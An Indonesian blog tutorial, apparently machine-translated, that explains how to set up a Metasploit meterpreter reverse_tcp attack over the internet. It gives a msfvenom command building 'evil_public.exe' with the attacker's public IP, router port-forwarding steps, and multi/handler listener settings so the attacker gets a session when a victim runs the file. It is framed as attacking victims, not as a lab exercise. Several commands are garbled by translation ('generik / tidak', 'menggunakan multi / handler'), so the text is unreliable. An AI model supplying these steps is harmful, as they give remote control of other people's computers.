Cara Melakukan Serangan WAN (Internet)
Hay Sobat, jika Anda ingin melakukan eksploitasi pada korban, tetapi Anda tidak berada di jaringan yang sama dengan mesin mereka. Dalam tutorial ini, saya akan menunjukkan kepada Anda bagaimana untuk mengatur serangan meterpreter reverse_tcp yang bekerja melalui internet.
• Memahami Proses
Berikut adalah Proses membangun koneksi:
Ini sambungan terbalik dari mesin korban ke mesin penyerang melalui internet. Perhatikan bahwa sambungan harus melewati router penyerang; ini akan menjadi penting kemudian.
Jika kita memberi korban virus reverse_tcp dengan alamat IP lokal kami sebagai LHOST (di foto ini, itu 10.0.0.2), seperti yang kita akan di serangan LAN normal (bila Anda berada di jaringan yang sama dengan korban), seperti ini koneksi akan terlihat:
Seperti yang Anda lihat, mesin korban mencari 10.0.0.2 di jaringan sendiri. Dalam hal ini, 10.0.0.2 adalah printer yang, tentu saja, tidak mendengarkan untuk koneksi meterpreter.
Sebaliknya, kita harus memberikan alamat IP publik kita (dalam hal ini, itu 10.11.12.13), yang akan mengirim sesi ke router kami. Dari sana, tugas router kami untuk langsung ke komputer kita. Di sinilah port forwarding masuk.
Jika kita menggunakan, katakanlah, pelabuhan 4444 sebagai LPORT di payload reverese_tcp kami, dan kemudian memberitahu router untuk mengarahkan apa pun mencoba untuk terhubung ke port 4444 dari luar jaringan ke mesin Kali kita, maka kita dapat menerima koneksi. Tanpa port forwarding, koneksi tidak tahu dimana mesin di jaringan penyerang untuk mengarahkan koneksi ke, dan serangan itu tidak akan bekerja.
• Nomor Anda butuhkan:
1. Anda IP Address Lokal
2. Anda Alamat IP Public
3. Anda Router IP Address Lokal
4. Sebuah Pelabuhan Memilih Anda (namun tetap konsisten!)
Untuk menemukan alamat IP lokal Anda, buka terminal di mesin Kali Anda dan ketik:
ifconfig
Di bawah antarmuka Anda gunakan untuk menghubungkan ke jaringan (dalam hal ini saya menggunakan ethernet, jadi eth0), mencari nomor di samping "inet". Ini adalah alamat IP lokal Anda. Bagi saya, itu "10.0.0.13", tetapi demi tutorial ini saya akan terus berpura-pura itu "10.0.0.2".
Untuk menemukan alamat IP publik Anda, buka web browser dan arahkan ke canyouseeme.org . Di samping "IP Anda:" adalah alamat IP publik. Untuk tutorial ini, saya akan berpura-pura saya adalah "10.11.12.13". Kami akan menggunakan situs ini lagi nanti untuk memverifikasi apakah kita sudah pelabuhan diteruskan dengan benar.
Untuk menemukan alamat IP lokal router Anda, buka terminal di Kali dan Jenis:
route -n
Carilah nomor di bawah Gateway yang berisi bendera "UG". Dalam kasus saya, itu "10.0.0.1". Bagi Anda mungkin 192.168.1.1 atau beberapa varian lainnya.
Terakhir, saya akan menggunakan port 4444 untuk tutorial ini, karena itu adalah sedikit dari konvensi. Anda dapat menggunakan port yang berbeda jika Anda ingin, tapi pastikan untuk tetap sama untuk semua yang saya lakukan dalam tutorial ini.
Langkah 1: Membuat Payload
Untuk membuat payload, membuka terminal di Kali dan Jenis:
msfvenom -a x86 --platform Windows p windows / meterpreter / reverse_tcp -e generik / tidak -f exe LHOST = 10.11.12.13 LPORT = 4444> /root/Desktop/evil_ public.exe
Ini akan membuat virus "evil_public.exe" di desktop Anda.
Jangan lupa untuk mengganti "10.11.12.13" dengan alamat IP publik, dan "4444" dengan port apa pun yang Anda gunakan, jika tidak 4444.
Langkah 2: Port Forwarding
Proses port forwarding sedikit berbeda pada setiap router, jadi saya tidak bisa memberikan petunjuk khusus untuk router Anda. Namun, Anda harus dapat mengikuti petunjuk umum saya. Jika Anda mengalami kesulitan menemukan pengaturan yang saya berubah pada preferensi router Anda sendiri, saya sarankan Anda melihat online untuk petunjuk mengenai model router tertentu Anda sendiri.
Pertama, Anda harus login ke router Anda. Untuk melakukannya, ketik IP alamat IP lokal router Anda ke dalam browser Anda. Sebuah halaman login akan ditampilkan, di mana Anda akan diminta untuk memasukkan username dan password.
Jika Anda telah mengubah masuk router Anda sebelum, ketik kredensial. Jika Anda belum, ketik username dan password default untuk router Anda. Ini biasanya 'admin' dan 'password', tetapi jika Anda tidak yakin, periksa kemasan router Anda atau internet.
Bonus: Jika Anda menggunakan password default untuk router Anda, itu ide yang baik untuk mengubahnya. Menjaga sebagai-adalah merupakan resiko keamanan besar.
Berikutnya, Anda akan perlu untuk menemukan port forwarding bagian dari pengaturan router Anda. Bagi saya itu di bawah tab "Advanced".
Setelah mengklik "Add Service", Anda akan diminta untuk memasukkan beberapa parameter. Untuk "Server IP Address", menggunakan alamat IP lokal mesin menyerang Anda. Untuk Start dan port End, masukan port yang sama yang Anda telah menggunakan selama tutorial ini.
Setelah Anda klik simpan, Anda harus port-diteruskan.
Langkah 3: Mulai Pendengar
Terakhir, kita harus mengatur pendengar menunggu untuk sesi meterpreter. Jalankan kerangka metasploit dengan mengetik:
msfconsole
Setelah itu beban, ketik:
menggunakan multi / handler
Sekarang, Anda akan perlu mengetikkan serangkaian pilihan. Saya akan daftar mereka untuk Anda:
set payload windows / meterpreter / reverse_tcp set LHOST 10.0.0.2 set LPORT 4444
Sekali lagi, ingat untuk mengubah LHOST ke alamat IP lokal Anda, dan mengubah LPORT jika Anda menggunakan sesuatu selain 4444.
Akhirnya, ketik "mengeksploitasi" dan tekan enter untuk memulai pendengar. Begitu korban anda menjalankan "evil_public.exe" virus, Anda akan mendapatkan sesi.
Jika Anda tidak yakin jika Anda port-diteruskan dengan benar, kembali ke canyouseeme.org dan ketik port yang digunakan di samping "Pelabuhan untuk Memeriksa:" pilihan. Setelah Anda klik "Periksa Port", itu harus mengatakan "Sukses" dalam huruf hijau. Jika Anda tidak port forward dengan benar, ia akan berkata "Kesalahan" dalam huruf merah.
Baiklah, itu saja! Saya harap Anda menemukan posting ini bermanfaat dan mudah diikuti. Jika Anda memiliki masalah, kritik, atau pujian, jangan lupa untuk memberikan komentar. Terima kasih sudah membaca!
Comments
Post a Comment
WeLcOmE TO My SiTeS